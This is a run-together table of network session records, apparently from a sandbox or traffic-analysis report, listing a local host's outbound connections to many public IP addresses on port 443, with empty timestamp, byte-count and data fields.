                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14967192.168.2.1533766210.48.67.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14968192.168.2.154884834.183.139.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14969192.168.2.154739891.245.155.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14970192.168.2.1556034107.247.157.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14971192.168.2.154875891.60.190.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14972192.168.2.1534272117.225.73.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14973192.168.2.1553710170.175.37.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14974192.168.2.1557352101.67.211.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14975192.168.2.154360254.246.62.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14976192.168.2.154289053.60.18.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14977192.168.2.1549418141.191.29.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14978192.168.2.155733044.20.105.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14979192.168.2.153447260.77.224.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14980192.168.2.1556994200.112.127.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14981192.168.2.155736470.124.138.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14982192.168.2.1553864196.204.180.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14983192.168.2.154735498.7.36.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14984192.168.2.1540874198.56.216.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14985192.168.2.154659698.135.76.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14986192.168.2.1536382174.20.206.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14987192.168.2.1552036121.242.103.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14988192.168.2.1535584157.110.242.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14989192.168.2.1539754208.201.58.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14990192.168.2.1552998223.222.169.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14991192.168.2.1549836189.107.195.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14992192.168.2.154734666.178.233.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14993192.168.2.1556022117.176.52.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14994192.168.2.1548196132.102.219.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14995192.168.2.154321480.16.217.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14996192.168.2.153960495.17.6.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14997192.168.2.1559892128.243.30.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14998192.168.2.156089687.240.181.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14999192.168.2.1536850223.205.56.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15000192.168.2.155501671.62.246.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15001192.168.2.1533578174.111.103.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15002192.168.2.1544074113.116.140.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15003192.168.2.1540286112.182.223.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15004192.168.2.1549968132.107.32.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15005192.168.2.1534652142.55.196.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15006192.168.2.1543900123.213.236.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15007192.168.2.155592012.27.66.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15008192.168.2.1553832125.190.185.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15009192.168.2.1538828199.107.40.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15010192.168.2.155261619.51.22.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15011192.168.2.1537370212.59.6.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15012192.168.2.1539852174.217.212.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15013192.168.2.1537026172.181.60.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15014192.168.2.1537924101.85.248.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15015192.168.2.155230431.55.29.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15016192.168.2.1543280218.250.200.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15017192.168.2.154809075.253.152.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15018192.168.2.1551424177.154.172.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15019192.168.2.155623285.192.152.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15020192.168.2.1552660181.238.251.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15021192.168.2.15474889.169.20.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15022192.168.2.156089020.109.85.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15023192.168.2.155054497.90.187.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15024192.168.2.155654063.255.104.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15025192.168.2.15488945.59.215.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15026192.168.2.156072479.10.48.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15027192.168.2.1536776176.229.140.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15028192.168.2.1543446181.129.187.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15029192.168.2.1557752163.158.4.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15030192.168.2.15592142.219.36.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15031192.168.2.153572076.251.201.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15032192.168.2.1535148138.177.98.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15033192.168.2.155507472.166.54.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15034192.168.2.154202670.238.19.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15035192.168.2.1546668143.117.190.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15036192.168.2.15458102.212.55.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15037192.168.2.1552310199.196.56.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15038192.168.2.1557950177.143.171.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15039192.168.2.1555718149.201.50.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15040192.168.2.154795866.148.193.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15041192.168.2.15594864.172.86.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15042192.168.2.1557942151.101.95.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15043192.168.2.154940452.21.187.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15044192.168.2.155246014.37.210.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15045192.168.2.1542536204.14.61.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15046192.168.2.154565870.29.174.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15047192.168.2.15578305.185.131.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15048192.168.2.1554864111.229.174.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15049192.168.2.1535136212.145.14.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15050192.168.2.153521488.206.109.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15051192.168.2.1532874171.71.36.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15052192.168.2.1553614171.202.34.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15053192.168.2.1545658111.148.188.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15054192.168.2.1547610213.101.162.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15055192.168.2.156087638.26.106.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15056192.168.2.153893027.81.38.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15057192.168.2.1560858203.29.105.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15058192.168.2.1534640152.252.157.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15059192.168.2.155356614.165.89.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15060192.168.2.1542526101.235.53.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15061192.168.2.154952277.76.204.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15062192.168.2.1549986159.249.181.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15063192.168.2.1551436100.204.45.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15064192.168.2.154148076.143.203.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15065192.168.2.1539002164.131.33.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15066192.168.2.155773665.159.200.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15067192.168.2.1536970204.107.38.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15068192.168.2.1547060182.10.117.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15069192.168.2.1553038164.157.22.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15070192.168.2.1551694106.9.177.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15071192.168.2.155199274.238.57.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15072192.168.2.153305475.97.127.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15073192.168.2.1545196194.33.220.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15074192.168.2.1558934180.252.69.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15075192.168.2.1535300205.99.14.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15076192.168.2.15414969.69.95.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15077192.168.2.1558786125.50.123.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15078192.168.2.155597625.107.41.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15079192.168.2.1558184162.14.50.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15080192.168.2.1557474150.217.24.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15081192.168.2.1559216217.172.121.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15082192.168.2.154750862.157.92.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15083192.168.2.1558752164.214.24.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15084192.168.2.1538556174.107.65.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15085192.168.2.1553388219.149.49.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15086192.168.2.154425486.13.104.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15087192.168.2.156052075.0.126.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15088192.168.2.1544108185.207.109.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15089192.168.2.1553520192.240.4.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15090192.168.2.1555734190.89.69.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15091192.168.2.1533564167.153.152.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15092192.168.2.154144074.150.181.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15093192.168.2.1535294125.89.210.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15094192.168.2.1544778137.114.253.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15095192.168.2.1539460148.156.86.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15096192.168.2.154011650.49.142.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15097192.168.2.1542776124.174.154.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15098192.168.2.1548154191.7.98.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15099192.168.2.1541886213.115.47.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15100192.168.2.154806225.235.21.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15101192.168.2.1539468210.11.178.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15102192.168.2.1548850209.33.50.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15103192.168.2.15408428.19.29.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15104192.168.2.155269273.81.181.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15105192.168.2.1542832200.214.90.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15106192.168.2.154115450.138.179.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15107192.168.2.1542812204.214.75.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15108192.168.2.155867232.127.233.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15109192.168.2.153824694.99.226.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15110192.168.2.1554214108.51.124.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15111192.168.2.154077690.177.80.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15112192.168.2.154733874.97.216.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15113192.168.2.1539482125.82.227.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15114192.168.2.1538062113.10.181.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15115192.168.2.153597248.58.193.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15116192.168.2.154779888.130.84.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15117192.168.2.154911657.253.11.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15118192.168.2.1542502174.84.18.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15119192.168.2.1537536219.180.52.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15120192.168.2.1548522208.234.142.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15121192.168.2.1536148119.7.239.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15122192.168.2.1552656159.207.248.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15123192.168.2.1541570139.31.59.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15124192.168.2.154580837.78.189.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15125192.168.2.153471473.183.174.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15126192.168.2.1552776129.173.249.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15127192.168.2.153874217.201.93.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15128192.168.2.1547280137.215.199.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15129192.168.2.1534164112.74.144.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15130192.168.2.1549720190.86.124.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15131192.168.2.1556810191.174.93.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15132192.168.2.154414478.99.141.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15133192.168.2.1546446220.78.187.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15134192.168.2.155666281.106.183.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15135192.168.2.1542512141.231.137.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15136192.168.2.1543642117.47.230.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15137192.168.2.1558954199.59.1.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15138192.168.2.1552700145.145.214.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15139192.168.2.1544552197.177.211.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15140192.168.2.153859069.222.234.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15141192.168.2.1545788143.2.214.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15142192.168.2.1560014184.83.103.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15143192.168.2.1558918160.62.61.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15144192.168.2.155383067.72.230.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15145192.168.2.1547508191.27.170.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15146192.168.2.154163058.219.129.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15147192.168.2.153493489.134.44.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15148192.168.2.154510244.17.60.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15149192.168.2.154104059.12.42.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15150192.168.2.155685264.242.17.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15151192.168.2.1557544155.104.157.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15152192.168.2.154751681.125.11.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15153192.168.2.1538040175.224.27.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15154192.168.2.154819846.251.15.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15155192.168.2.1546174220.89.165.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15156192.168.2.15445449.193.196.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15157192.168.2.1556210156.199.119.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15158192.168.2.154465079.204.224.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15159192.168.2.1537002104.187.81.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15160192.168.2.155905474.34.13.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15161192.168.2.153813465.136.206.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15162192.168.2.155458252.56.149.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15163192.168.2.153282294.179.10.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15164192.168.2.1556976124.114.116.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15165192.168.2.155739477.214.205.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15166192.168.2.154187437.246.253.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15167192.168.2.1533168107.181.180.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15168192.168.2.1551604199.109.59.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15169192.168.2.1549326223.115.4.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15170192.168.2.1545392112.177.157.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15171192.168.2.1555392201.234.154.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15172192.168.2.1559946192.68.223.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15173192.168.2.153892696.31.166.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15174192.168.2.155607668.182.120.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15175192.168.2.1539716157.204.221.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15176192.168.2.1554488217.166.184.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15177192.168.2.1546116141.255.103.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15178192.168.2.1535146105.202.186.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15179192.168.2.1544058125.191.111.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15180192.168.2.153783417.107.98.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15181192.168.2.1555730111.157.156.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15182192.168.2.155024217.55.204.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15183192.168.2.155515062.236.94.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15184192.168.2.1545120134.44.51.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15185192.168.2.1535658109.245.184.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15186192.168.2.1534314143.139.74.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15187192.168.2.1543912116.226.57.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15188192.168.2.155860012.53.19.7443
